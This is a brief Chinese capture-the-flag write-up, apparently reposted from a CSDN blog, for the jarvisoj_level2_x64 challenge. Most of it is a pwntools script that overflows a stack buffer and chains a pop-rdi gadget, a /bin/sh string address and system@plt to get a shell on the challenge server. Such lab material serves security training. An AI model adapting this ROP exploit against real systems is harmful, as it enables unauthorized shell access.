jarvisoj_level2_x64
作者:互联网
jarvisoj_level2_x64
查看保护
溢出,有system sh
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 26759)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
system_plt = elf.plt['system']
bin_sh = 0x0000000000600a90
pop_rdi_ret = 0x00000000004006b3
p1 = b'a' * (0x80 + 8) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_plt)
r.sendline(p1)
r.interactive()
标签:plt,p64,x64,system,level2,sh,file,jarvisoj,name 来源: https://blog.csdn.net/zzq487782568/article/details/121736317